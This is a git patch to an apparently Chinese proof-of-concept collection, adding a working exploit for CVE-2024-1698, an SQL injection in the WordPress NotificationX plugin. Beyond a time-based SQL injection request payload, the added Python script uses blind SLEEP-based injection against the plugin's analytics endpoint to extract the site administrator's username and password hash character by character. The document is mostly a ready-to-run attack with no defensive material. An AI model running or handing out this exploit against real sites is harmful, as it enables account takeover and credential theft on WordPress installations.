From ffad9cdfaa42edd5b54e730157f1ee139fe10dfe Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 1 May 2024 11:59:25 +0800 Subject: [PATCH] =?UTF-8?q?Update=20WordPress=E6=8F=92=E4=BB=B6Notificatio?= =?UTF-8?q?nX=E5=AD=98=E5=9C=A8sql=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(CVE?= =?UTF-8?q?-2024-1698).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tificationX存在sql注入漏洞(CVE-2024-1698).md | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) diff --git a/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md index ffbcc55..9caf355 100644 --- a/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md +++ b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md @@ -13,3 +13,82 @@ Content-Type: application/json {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"} ``` + +## 利用基本 +```python +import requests +import string +from sys import exit + +# Sleep time for SQL payloads +delay = 0.3 + +# URL for the NotificationX Analytics API +url = "http://localhost/wp-json/notificationx/v1/analytics" + +admin_username = "" +admin_password_hash = "" + +session = requests.Session() + +# Find admin username length +username_length = 0 +for length in range(1, 41): # Assuming username length is less than 40 characters + resp_length = session.post(url, data={ + "nx_id": 1337, + "type": f"clicks`=IF(LENGTH((select user_login from wp_users where id=1))={length},SLEEP({delay}),null)-- -" + }) + + # Elapsed time > delay if delay happened due to SQLi + if resp_length.elapsed.total_seconds() > delay: + username_length = length + print("Admin username length:", username_length) + break + +# Find admin username +for idx_username in range(1, username_length + 1): + # Iterate over all the printable characters + NULL byte + for ascii_val_username in (b"\x00" + string.printable.encode()): + # Send the payload + resp_username = session.post(url, data={ + "nx_id": 1337, + "type": f"clicks`=IF(ASCII(SUBSTRING((select user_login from wp_users where id=1),{idx_username},1))={ascii_val_username},SLEEP({delay}),null)-- -" + }) + + # Elapsed time > delay if delay happened due to SQLi + if resp_username.elapsed.total_seconds() > delay: + admin_username += chr(ascii_val_username) + # Show what we have found so far... + print("Admin username:", admin_username) + break # Move to the next character + else: + # Null byte reached, break the outer loop + break + +# Find admin password hash +for idx_password in range(1, 41): # Assuming the password hash length is less than 40 characters + # Iterate over all the printable characters + NULL byte + for ascii_val_password in (b"\x00" + string.printable.encode()): + # Send the payload + resp_password = session.post(url, data={ + "nx_id": 1337, + "type": f"clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),{idx_password},1))={ascii_val_password},SLEEP({delay}),null)-- -" + }) + + # Elapsed time > delay if delay happened due to SQLi + if resp_password.elapsed.total_seconds() > delay: + admin_password_hash += chr(ascii_val_password) + # Show what we have found so far... + print("Admin password hash:", admin_password_hash) + # Exit condition - encountered a null byte + if ascii_val_password == 0: + print("[*] Admin credentials found:") + print("Username:", admin_username) + print("Password hash:", admin_password_hash) + exit(0) +``` + +![image](https://github.com/wy876/POC/assets/139549762/723e8a4e-635e-4c84-ad7b-fdacb629c1ca) + +## 来源 +- https://github.com/kamranhasan/CVE-2024-1698-Exploit